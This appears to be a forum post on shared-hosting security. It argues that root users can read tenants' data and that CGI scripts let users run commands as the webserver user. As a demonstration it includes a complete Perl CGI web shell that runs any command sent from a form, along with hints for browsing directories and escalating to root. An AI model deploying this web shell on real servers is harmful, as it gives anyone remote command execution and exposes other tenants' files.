So just let me get this straight ;-) According to you:

1. You think you are the only one with access to the database.
2. The database is on another server
3. It is a shared server
4. You apparently don't have root on that server

Kneel before me, for I am ROOT, and your data is mine to behold

Hm...so are you suggesting using a shared server is bad? Since whoever owns the server ownz you?

You need to trust whoever has root on a shared server not to read your mail or any other files and to keep the box itself secure. The problem is that users of shared servers want to do insecure stuff like write their own CGI scripts. For example install this script. Try ls, then ls .. then ls -al ../../../. You can run generally run any command you want as the webserver user which can generally be escalated to root the box, if you were so inclined.

#!/usr/bin/perl
$|++;
use CGI qw( :standard );
use CGI::Carp qw( fatalsToBrowser );
my $command = param('command'); 
print header, start_form({ -method=>'get' }), textfield({-size=>75,-na
+me=>'command'}), submit('Run'), end_form;
if ($command) {
  open( CMD, "$command 2>&1|" ) or die "$!: running command: '$command
+'";
  print "<pre>";
  print escapeHTML($_,1) while<CMD>;
  print "</pre>\n", end_html;
  close CMD;
}
[download]

cheers

tachyon